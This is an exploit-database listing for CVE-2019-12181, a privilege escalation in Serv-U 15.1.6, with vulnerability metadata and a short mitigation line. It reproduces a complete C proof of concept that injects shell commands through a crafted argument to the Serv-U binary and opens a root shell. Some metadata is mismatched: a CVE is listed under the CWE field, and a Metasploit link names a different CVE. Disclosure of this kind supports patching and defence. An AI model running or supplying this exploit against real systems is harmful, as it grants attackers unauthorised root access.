header-logo
Suggest Exploit
vendor:
Serv-U
by:
Guy Levin
8.8
CVSS
HIGH
Privilege Escalation
269
CWE
Product Name: Serv-U
Affected Version From: 15.1.2006
Affected Version To: Unknown
Patch Exists: YES
Related CWE: CVE-2019-12181
CPE: a:rhino-software:serv-u:15.1.6
Metasploit: https://www.rapid7.com/db/vulnerabilities/amazon-linux-ami-2-cve-2018-12181/
Other Scripts:
Platforms Tested:
2019

CVE-2019-12181 Serv-U 15.1.6 Privilege Escalation

This exploit allows an attacker to escalate their privileges in Serv-U version 15.1.6. By providing specific arguments to the program, an attacker can execute arbitrary commands with root privileges.

Mitigation:

Upgrade to a patched version of Serv-U or apply the vendor-provided patch.
Source

Exploit-DB raw data:

/*

CVE-2019-12181 Serv-U 15.1.6 Privilege Escalation 

vulnerability found by:
Guy Levin (@va_start - twitter.com/va_start) https://blog.vastart.dev

to compile and run:
gcc servu-pe-cve-2019-12181.c -o pe && ./pe

*/

#include <stdio.h>
#include <unistd.h>
#include <errno.h>

int main()
{       
    char *vuln_args[] = {"\" ; id; echo 'opening root shell' ; /bin/sh; \"", "-prepareinstallation", NULL};
    int ret_val = execv("/usr/local/Serv-U/Serv-U", vuln_args);
    // if execv is successful, we won't reach here
    printf("ret val: %d errno: %d\n", ret_val, errno);
    return errno;
}

Navigation

Suggest Exploit

Services By CQR